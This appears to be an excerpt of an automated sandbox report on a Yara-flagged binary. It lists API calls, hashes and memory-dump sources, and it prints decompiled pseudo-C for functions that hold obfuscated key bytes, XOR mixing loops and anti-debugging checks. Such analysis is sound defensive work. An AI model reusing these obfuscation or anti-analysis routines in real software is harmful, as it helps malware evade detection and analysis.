                                                                                • Opcode ID: 5ae71b66ce67940abd36b3045bebaf34cf4d3d32628ce2254455733b7bd3bfd3
                                                                                • Instruction ID: 92d5f1821dd3087d4e7dc77925b8887368f6326e4a95ea35ca1d9da69d18d743
                                                                                • Opcode Fuzzy Hash: 5ae71b66ce67940abd36b3045bebaf34cf4d3d32628ce2254455733b7bd3bfd3
                                                                                • Instruction Fuzzy Hash: 1721C672A00304EBCF20AF99DD81B5ABBF4BF04708F04483AE645D7202D678E954CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048FED9, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0048FF04
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 082b20c7a03fdab3cc33d574c10bb021c57e165413355a68de40628e0976087d
                                                                                • Instruction ID: 2e8f6f7748eaef1a81948672398a6272f665005e92e72ce12bf6c12643d2e041
                                                                                • Opcode Fuzzy Hash: 082b20c7a03fdab3cc33d574c10bb021c57e165413355a68de40628e0976087d
                                                                                • Instruction Fuzzy Hash: 6C119072A00704ABCB10AF99CC85B9EB7F4AF05304F04487AE745D7212D774E959CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004900F0, Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32 ref: 004900FA
                                                                                  • Part of subcall function 0048F46C: VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048F493
                                                                                  • Part of subcall function 0048F46C: VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048F4BA
                                                                                  • Part of subcall function 0048F46C: GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048F4C0
                                                                                  • Part of subcall function 0048F46C: FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048F4C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$CacheCloseCurrentFlushHandleInstructionProcess
                                                                                • String ID:
                                                                                • API String ID: 2900862000-0
                                                                                • Opcode ID: 996353df0a45330c46878d6c1a60e48001f5cfe9bcf41fef40e6b50f0b10096f
                                                                                • Instruction ID: 840203a668d8769d645263ec739f117059fb683fe1172dab8d11aa23342a09c4
                                                                                • Opcode Fuzzy Hash: 996353df0a45330c46878d6c1a60e48001f5cfe9bcf41fef40e6b50f0b10096f
                                                                                • Instruction Fuzzy Hash: B2F0223A800104EFCB109B85ED46E5EBBB8EB90769F20047BE444A7221C3766D41CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 0048BBB5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0048DB4E
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0048DB63
                                                                                • UnhandledExceptionFilter.KERNEL32(FI), ref: 0048DB6E
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0048DB8A
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0048DB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID: FI
                                                                                • API String ID: 2579439406-1293059371
                                                                                • Opcode ID: 807031ba3dfa138bf8dca9b0c4f3dc67835273f350ae91acf0c420aaa0d53d6e
                                                                                • Instruction ID: b8e9b097ad48f464bcad59a8399b0ed038067b003d2aa283789311110aa9c9a0
                                                                                • Opcode Fuzzy Hash: 807031ba3dfa138bf8dca9b0c4f3dc67835273f350ae91acf0c420aaa0d53d6e
                                                                                • Instruction Fuzzy Hash: FC21D0B88512499FC710EF95F949A583BF4FBAA304F1150BBE41883774E7745A828F5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048A746, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00001704), ref: 0048A74B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 403e1ff0d8d71728c0d54f19a939813f7ec8e54641915ba13776238b1e81135c
                                                                                • Instruction ID: 81433e7e343146cc976c64969640f8e966be3140acd685938dc30b2b020c0812
                                                                                • Opcode Fuzzy Hash: 403e1ff0d8d71728c0d54f19a939813f7ec8e54641915ba13776238b1e81135c
                                                                                • Instruction Fuzzy Hash: 8E9002646611428A960037B05D1955965A05A587027515873A115D4464DAA98050662A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F412, Relevance: .0, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e624ca07e480b20f3e87d250268d7befd875a58a2c7744576e64497166e65542
                                                                                • Instruction ID: 66c3af05f4c833101bcd62443286c7dc37dad603ef252332458b9e5ff3faedc0
                                                                                • Opcode Fuzzy Hash: e624ca07e480b20f3e87d250268d7befd875a58a2c7744576e64497166e65542
                                                                                • Instruction Fuzzy Hash: 38D0A93091528CEFDB01CF48D102B8EBBB8AB0070CF600089D0005B342C2B9AE02DB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F4D0, Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c38f530f393c8e445e7f9ebfc598e40a83d4b02ab9be02f0dcf01f71a647c4e9
                                                                                • Instruction ID: 1128efe6a1c562d64635b53d85e06f8595b5e71423cf0e78613a8e238405d936
                                                                                • Opcode Fuzzy Hash: c38f530f393c8e445e7f9ebfc598e40a83d4b02ab9be02f0dcf01f71a647c4e9
                                                                                • Instruction Fuzzy Hash: 74D0127090528CEFDB11CB44D205B4EBBF8AB00B5CF118098E00597681C3B9AF48D754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004A04CE, Relevance: 60.3, Strings: 48, Instructions: 282COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                                • API String ID: 0-140969752
                                                                                • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                • Instruction ID: 06c4c55b5f7c0cabfc9a08f70ed99313b441ce6f7a1b330f367ec5fe98c38343
                                                                                • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                • Instruction Fuzzy Hash: D8F1F0209087E98DDB32C7788C097CEBE655B23324F0843D9D5E87A2D2D7B54B85CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B1E6, Relevance: 60.3, Strings: 48, Instructions: 282COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E0040B1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				signed char* _v16;
				signed char* _v20;
				signed char* _v24;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				signed char* _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				signed char* _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				signed int _v300;
				char _v320;
				void _v348;
				void* __ebx;
				void* __edi;
				void* _t178;
				void* _t180;
				void* _t182;
				signed char* _t184;
				intOrPtr _t219;
				signed int _t231;
				intOrPtr _t242;

				_t242 = __ecx;
				_push(0x44356c);
				_v292 = __ecx;
				_a4 = _a4 + 4;
				_t178 = E0041105D(_a4 + 4);
				_push(_t178);
				L0044B581();
				_t219 = _a8;
				if(_t178 == 0) {
					E00411069(E0041105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
				}
				_push(0x44357c);
				_t180 = E0041105D(_a4);
				_push(_t180);
				L0044B581();
				if(_t180 == 0) {
					E00411069(E0041105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
				}
				_push(0x443588);
				_t182 = E0041105D(_a4);
				_push(_t182);
				L0044B581();
				if(_t182 == 0) {
					E00411069(E0041105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
				}
				_push(0x443598);
				_t184 = E0041105D(_a4);
				_push(_t184);
				L0044B581();
				if(_t184 != 0) {
					L13:
					return _t184;
				} else {
					_v24 = _t184;
					_v16 = _t184;
					_v20 = _t184;
					_v280 = 0x1d;
					_v279 = 0xac;
					_v278 = 0xa8;
					_v277 = 0xf8;
					_v276 = 0xd3;
					_v275 = 0xb8;
					_v274 = 0x48;
					_v273 = 0x3e;
					_v272 = 0x48;
					_v271 = 0x7d;
					_v270 = 0x3e;
					_v269 = 0xa;
					_v268 = 0x62;
					_v267 = 7;
					_v266 = 0xdd;
					_v265 = 0x26;
					_v264 = 0xe6;
					_v263 = 0x67;
					_v262 = 0x81;
					_v261 = 3;
					_v260 = 0xe7;
					_v259 = 0xb2;
					_v258 = 0x13;
					_v257 = 0xa5;
					_v256 = 0xb0;
					_v255 = 0x79;
					_v254 = 0xee;
					_v253 = 0x4f;
					_v252 = 0xf;
					_v251 = 0x41;
					_v250 = 0x15;
					_v249 = 0xed;
					_v248 = 0x7b;
					_v247 = 0x14;
					_v246 = 0x8c;
					_v245 = 0xe5;
					_v244 = 0x4b;
					_v243 = 0x46;
					_v242 = 0xd;
					_v241 = 0xc1;
					_v240 = 0x8e;
					_v239 = 0xfe;
					_v238 = 0xd6;
					_v237 = 0xe7;
					_v236 = 0x27;
					_v235 = 0x75;
					_v234 = 6;
					_v233 = 0x8b;
					_v232 = 0x49;
					_v231 = _t184;
					_v230 = 0xdc;
					_v229 = 0xf;
					_v228 = 0x30;
					_v227 = 0xa0;
					_v226 = 0x9e;
					_v225 = 0xfd;
					_v224 = 9;
					_v223 = 0x85;
					_v222 = 0xf1;
					_v221 = 0xc8;
					_v220 = 0xaa;
					_v219 = 0x75;
					_v218 = 0xc1;
					_v217 = 8;
					_v216 = 5;
					_v215 = 0x79;
					_v214 = 1;
					_v213 = 0xe2;
					_v212 = 0x97;
					_v211 = 0xd8;
					_v210 = 0xaf;
					_v209 = 0x80;
					_v208 = 0x38;
					_v207 = 0x60;
					_v206 = 0xb;
					_v205 = 0x71;
					_v204 = 0xe;
					_v203 = 0x68;
					_push(0x80);
					_push(_t184);
					_push( &_v152);
					_v202 = 0x53;
					_v201 = 0x77;
					_v200 = 0x2f;
					_v199 = 0xf;
					_v198 = 0x61;
					_v197 = 0xf6;
					_v196 = 0x1d;
					_v195 = 0x8e;
					_v194 = 0x8f;
					_v193 = 0x5c;
					_v192 = 0xb2;
					_v191 = 0x3d;
					_v190 = 0x21;
					_v189 = 0x74;
					_v188 = 0x40;
					_v187 = 0x4b;
					_v186 = 0xb5;
					_v185 = 6;
					_v184 = 0x6e;
					_v183 = 0xab;
					_v182 = 0x7a;
					_v181 = 0xbd;
					_v180 = 0x8b;
					_v179 = 0xa9;
					_v178 = 0x7e;
					_v177 = 0x32;
					_v176 = 0x8f;
					_v175 = 0x6e;
					_v174 = 6;
					_v173 = 0x24;
					_v172 = 0xd9;
					_v171 = 0x29;
					_v170 = 0xa4;
					_v169 = 0xa5;
					_v168 = 0xbe;
					_v167 = 0x26;
					_v166 = 0x23;
					_v165 = 0xfd;
					_v164 = 0xee;
					_v163 = 0xf1;
					_v162 = 0x4c;
					_v161 = 0xf;
					_v160 = 0x74;
					_v159 = 0x5e;
					_v158 = 0x58;
					_v157 = 0xfb;
					_v156 = 0x91;
					_v155 = 0x74;
					_v154 = 0xef;
					_v153 = 0x91;
					L0044B531();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t231 = 7;
					_push(0x11);
					asm("movsb");
					_push( &_v320);
					_push( &_v152);
					memcpy( &_v348, 0x4435b8, _t231 << 2);
					L0044B575();
					_v8 =  &_v280;
					_v296 =  *((intOrPtr*)(_t219 + 0x18));
					_v12 = 0x90;
					_v300 =  *(_t219 + 2) & 0x0000ffff;
					if(E0040C860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
						L9:
						_t184 = _v284;
						if(_t184 != 0) {
							E0041118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
							_t184 =  *0x4430d8(_v284);
						}
						L11:
						if(_v24 == 0) {
							goto L13;
						}
						return  *0x443100(_v24);
					}
					_push(0x1c);
					_push( &_v348);
					_push( &_v152);
					L0044B575();
					_v8 =  &_v280;
					_v12 = 0x9b;
					_t184 = E0040C860( &_v24,  &_v300,  &_v12, 0,  &_v288);
					if(_t184 == 0) {
						goto L11;
					}
					goto L9;
				}
			}

























































































































































                                                                                0x0040b1f8
                                                                                0x0040b1fa
                                                                                0x0040b1ff
                                                                                0x0040b205
                                                                                0x0040b208
                                                                                0x0040b20d
                                                                                0x0040b20e
                                                                                0x0040b215
                                                                                0x0040b21a
                                                                                0x0040b22b
                                                                                0x0040b22b
                                                                                0x0040b233
                                                                                0x0040b238
                                                                                0x0040b23d
                                                                                0x0040b23e
                                                                                0x0040b247
                                                                                0x0040b258
                                                                                0x0040b258
                                                                                0x0040b260
                                                                                0x0040b265
                                                                                0x0040b26a
                                                                                0x0040b26b
                                                                                0x0040b274
                                                                                0x0040b285
                                                                                0x0040b285
                                                                                0x0040b28d
                                                                                0x0040b292
                                                                                0x0040b297
                                                                                0x0040b298
                                                                                0x0040b2a1
                                                                                0x0040b744
                                                                                0x0040b744
                                                                                0x0040b2a7
                                                                                0x0040b2a7
                                                                                0x0040b2aa
                                                                                0x0040b2ad
                                                                                0x0040b2b0
                                                                                0x0040b2b7
                                                                                0x0040b2be
                                                                                0x0040b2c5
                                                                                0x0040b2cc
                                                                                0x0040b2d3
                                                                                0x0040b2da
                                                                                0x0040b2e1
                                                                                0x0040b2e8
                                                                                0x0040b2ef
                                                                                0x0040b2f6
                                                                                0x0040b2fd
                                                                                0x0040b304
                                                                                0x0040b30b
                                                                                0x0040b312
                                                                                0x0040b319
                                                                                0x0040b320
                                                                                0x0040b327
                                                                                0x0040b32e
                                                                                0x0040b335
                                                                                0x0040b33c
                                                                                0x0040b343
                                                                                0x0040b34a
                                                                                0x0040b351
                                                                                0x0040b358
                                                                                0x0040b35f
                                                                                0x0040b366
                                                                                0x0040b36d
                                                                                0x0040b374
                                                                                0x0040b37b
                                                                                0x0040b382
                                                                                0x0040b389
                                                                                0x0040b390
                                                                                0x0040b397
                                                                                0x0040b39e
                                                                                0x0040b3a5
                                                                                0x0040b3ac
                                                                                0x0040b3b3
                                                                                0x0040b3ba
                                                                                0x0040b3c1
                                                                                0x0040b3c8
                                                                                0x0040b3cf
                                                                                0x0040b3d6
                                                                                0x0040b3dd
                                                                                0x0040b3e4
                                                                                0x0040b3eb
                                                                                0x0040b3f2
                                                                                0x0040b3f9
                                                                                0x0040b400
                                                                                0x0040b407
                                                                                0x0040b40d
                                                                                0x0040b414
                                                                                0x0040b41b
                                                                                0x0040b422
                                                                                0x0040b429
                                                                                0x0040b430
                                                                                0x0040b437
                                                                                0x0040b43e
                                                                                0x0040b445
                                                                                0x0040b44c
                                                                                0x0040b453
                                                                                0x0040b45a
                                                                                0x0040b461
                                                                                0x0040b468
                                                                                0x0040b46f
                                                                                0x0040b476
                                                                                0x0040b47d
                                                                                0x0040b484
                                                                                0x0040b48b
                                                                                0x0040b492
                                                                                0x0040b499
                                                                                0x0040b4a0
                                                                                0x0040b4a7
                                                                                0x0040b4ae
                                                                                0x0040b4b5
                                                                                0x0040b4bc
                                                                                0x0040b4c3
                                                                                0x0040b4ca
                                                                                0x0040b4d1
                                                                                0x0040b4d6
                                                                                0x0040b4dd
                                                                                0x0040b4de
                                                                                0x0040b4e5
                                                                                0x0040b4ec
                                                                                0x0040b4f3
                                                                                0x0040b4fa
                                                                                0x0040b501
                                                                                0x0040b508
                                                                                0x0040b50f
                                                                                0x0040b516
                                                                                0x0040b51d
                                                                                0x0040b524
                                                                                0x0040b52b
                                                                                0x0040b532
                                                                                0x0040b539
                                                                                0x0040b540
                                                                                0x0040b547
                                                                                0x0040b54e
                                                                                0x0040b555
                                                                                0x0040b55c
                                                                                0x0040b563
                                                                                0x0040b56a
                                                                                0x0040b571
                                                                                0x0040b578
                                                                                0x0040b57f
                                                                                0x0040b586
                                                                                0x0040b58d
                                                                                0x0040b594
                                                                                0x0040b59b
                                                                                0x0040b5a2
                                                                                0x0040b5a9
                                                                                0x0040b5b0
                                                                                0x0040b5b7
                                                                                0x0040b5be
                                                                                0x0040b5c5
                                                                                0x0040b5cc
                                                                                0x0040b5d3
                                                                                0x0040b5da
                                                                                0x0040b5e1
                                                                                0x0040b5e8
                                                                                0x0040b5ef
                                                                                0x0040b5f6
                                                                                0x0040b5fd
                                                                                0x0040b604
                                                                                0x0040b60b
                                                                                0x0040b612
                                                                                0x0040b619
                                                                                0x0040b620
                                                                                0x0040b627
                                                                                0x0040b62e
                                                                                0x0040b635
                                                                                0x0040b63c
                                                                                0x0040b64c
                                                                                0x0040b64d
                                                                                0x0040b64e
                                                                                0x0040b651
                                                                                0x0040b652
                                                                                0x0040b653
                                                                                0x0040b65b
                                                                                0x0040b65c
                                                                                0x0040b66e
                                                                                0x0040b66f
                                                                                0x0040b671
                                                                                0x0040b67c
                                                                                0x0040b682
                                                                                0x0040b68f
                                                                                0x0040b696
                                                                                0x0040b6bb
                                                                                0x0040b704
                                                                                0x0040b704
                                                                                0x0040b70c
                                                                                0x0040b720
                                                                                0x0040b72b
                                                                                0x0040b72b
                                                                                0x0040b731
                                                                                0x0040b735
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b73a
                                                                                0x0040b6bd
                                                                                0x0040b6c5
                                                                                0x0040b6cc
                                                                                0x0040b6cd
                                                                                0x0040b6db
                                                                                0x0040b6f4
                                                                                0x0040b6fb
                                                                                0x0040b702
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b702

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.765485228.0000000000400000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000001.00000002.765637451.0000000000482000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                                • API String ID: 0-140969752
                                                                                • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                • Instruction ID: b3b03687bd6bacd840c90b17c05aedc23d9fa5d3dc97117df5ba02558f5b3d9c
                                                                                • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                • Instruction Fuzzy Hash: 1EF1F0209087E9C9DB32C7788C097CEBE645B27324F0443DAD1E97A2D2D7B54BC58B66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048B03C, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00492660,0000000C,0048B177,00000000,00000000,?,?,0048A6BF,0048910E), ref: 0048B04E
                                                                                • __crt_waiting_on_module_handle.LIBCMT ref: 0048B059
                                                                                  • Part of subcall function 0048A15C: Sleep.KERNEL32(000003E8,?,?,0048AF9F,KERNEL32.DLL,?,0048A6EC,?,00489108,?), ref: 0048A168
                                                                                  • Part of subcall function 0048A15C: GetModuleHandleW.KERNEL32(?,?,?,0048AF9F,KERNEL32.DLL,?,0048A6EC,?,00489108,?), ref: 0048A171
                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0048B082
                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0048B092
                                                                                • __lock.LIBCMT ref: 0048B0B4
                                                                                • InterlockedIncrement.KERNEL32(004934D8), ref: 0048B0C1
                                                                                • __lock.LIBCMT ref: 0048B0D5
                                                                                • ___addlocaleref.LIBCMT ref: 0048B0F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                • API String ID: 1028249917-2843748187
                                                                                • Opcode ID: f71737a39c52cd78a48e74ce37244a19c2382bd74f8a6e67bfcf91d1d0e296c6
                                                                                • Instruction ID: a9aaf04b4586c950861128c32e65cb89b2736f1ed5330593efd498b0f2e58603
                                                                                • Opcode Fuzzy Hash: f71737a39c52cd78a48e74ce37244a19c2382bd74f8a6e67bfcf91d1d0e296c6
                                                                                • Instruction Fuzzy Hash: 6511C370900702AEDB21AF76C801B9EBBE0AF01314F10892FE4A9937A1CB7C99418B5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004FB3A6, Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                • API String ID: 0-3760989150
                                                                                • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                • Instruction ID: f2bc64ad88cee6a9e767b0469ae0257665808a0ab5ce2db2a82fee9a74a0ec21
                                                                                • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                • Instruction Fuzzy Hash: 5151E771C0065DAEDB11CBA4CC44AFEBBBCFF49314F0442A9E559E6182D3389B85CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004660BE, Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 45%
                                                                                			E004660BE(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v291;
				char _v292;
				char _v547;
				char _v548;
				char _v1058;
				char _v1060;
				char _v1570;
				char _v1572;
				char* _t81;
				char* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				signed int _t97;
				intOrPtr* _t102;
				signed short* _t103;
				intOrPtr _t106;
				void* _t107;

				_t85 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				L004703F4();
				_v548 = 0;
				L004703F4();
				_v1572 = 0;
				L004703F4();
				_v1060 = 0;
				L004703F4();
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
				_v24 = 0xff;
				 *0x412018( &_v548,  &_v24);
				_t102 =  *0x4120d0; // 0x758dffff
				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_t81 =  &_v292;
				_push(_t81);
				L004703B6();
				_v32 = _t81;
				_t82 =  &_v548;
				_push(_t82);
				L004703B6();
				_t106 = _v36;
				_v28 = _t82;
				_push(0x10);
				_push( &_v20);
				_push(_t106);
				L0047043C();
				_t84 = 0xba0da71d;
				if(_v28 > 0) {
					_t103 =  &_v1060;
					do {
						_t97 = _a4 & 0x80000003;
						if(_t97 < 0) {
							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t89 = ( *_t103 & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
						_a4 = _a4 + 1;
						_t103 =  &(_t103[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t85) {
					do {
						_t92 = _a4 & 0x80000003;
						if(_t92 < 0) {
							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
						_a4 = _a4 + 1;
						_t85 = _t85 + 1;
					} while (_t85 < _v32);
				}
				return _t84;
			}











































                                                                                0x004660cf
                                                                                0x004660da
                                                                                0x004660de
                                                                                0x004660e2
                                                                                0x004660e6
                                                                                0x004660ea
                                                                                0x004660ee
                                                                                0x004660f2
                                                                                0x004660f6
                                                                                0x004660fa
                                                                                0x004660fe
                                                                                0x00466102
                                                                                0x00466106
                                                                                0x0046610a
                                                                                0x0046610e
                                                                                0x00466112
                                                                                0x00466116
                                                                                0x0046611a
                                                                                0x00466120
                                                                                0x0046612e
                                                                                0x00466134
                                                                                0x00466147
                                                                                0x0046614e
                                                                                0x0046615c
                                                                                0x00466163
                                                                                0x0046616e
                                                                                0x0046617f
                                                                                0x00466182
                                                                                0x00466185
                                                                                0x00466196
                                                                                0x00466199
                                                                                0x0046619f
                                                                                0x004661b8
                                                                                0x004661cd
                                                                                0x004661cf
                                                                                0x004661d5
                                                                                0x004661d6
                                                                                0x004661db
